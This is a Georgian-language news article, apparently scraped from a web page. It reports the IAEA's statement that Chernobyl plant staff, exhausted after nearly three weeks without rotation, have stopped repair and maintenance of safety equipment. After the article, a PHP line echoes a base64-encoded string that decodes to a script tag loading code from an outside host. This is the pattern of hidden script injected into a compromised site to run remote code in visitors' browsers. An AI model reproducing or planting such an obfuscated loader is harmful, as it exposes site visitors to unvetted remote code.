celsiusi
ავერსი საქკაბელი
 
ჩერნობილის ატომური ელექტროსადგურის თანამშრომლები იმდენად დაღლილები არიან, რომ უსაფრთხოებასთან დაკავშირებული აღჭურვილობის სარემონტო სამუშაოები და ტექნიკური მომსახურება შეწყვიტეს, - ამის შესახებ ატომური ენერგიის საერთაშორისო სააგენტომ განაცხადა.
 
ორგანიზაციის ინფორმაციით, უკრაინის მარეგულირებელმა ორგანომ მათ აცნობა, რომ ატომური ელექტროსადგურის პერსონალი აღარ ახორციელებს სარემონტო და ტექნიკურ სამუშაოებს, „ფიზიკური და ფსიქოლოგიური გადაღლილობის გამო თითქმის სამი კვირის განმავლობაში უწყვეტი მუშაობის შემდეგ“.
 
ატომური ენერგიის საერთაშორისო სააგენტოში აცხადებენ, რომ 211 ტექნიკური პერსონალისა და დაცვის როტაცია ჯერ კიდევ ვერ ხერხდება.
 
„უკრაინის მარეგულირებელს არ აქვს პირდაპირი კომუნიკაცია პერსონალთან, მაგრამ იღებს ინფორმაციას სადგურის გარე მენეჯმენტისგან“, - ნათქვამია ატომური ენერგიის საერთაშორისო სააგენტოს ინფორმაციაში.
 
შეგახსენებთ, მანამდე ცნობილი გახდა, რომ უკრაინის ეროვნულმა ენერგეტიკულმა კომპანიამ „უკრენერგომ“ დაასრულა სარემონტო სამუშაოები და ჩერნობილის ატომური ელექტროსადგურის ელექტროენერგიით მომარაგება განაახლა.
928
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");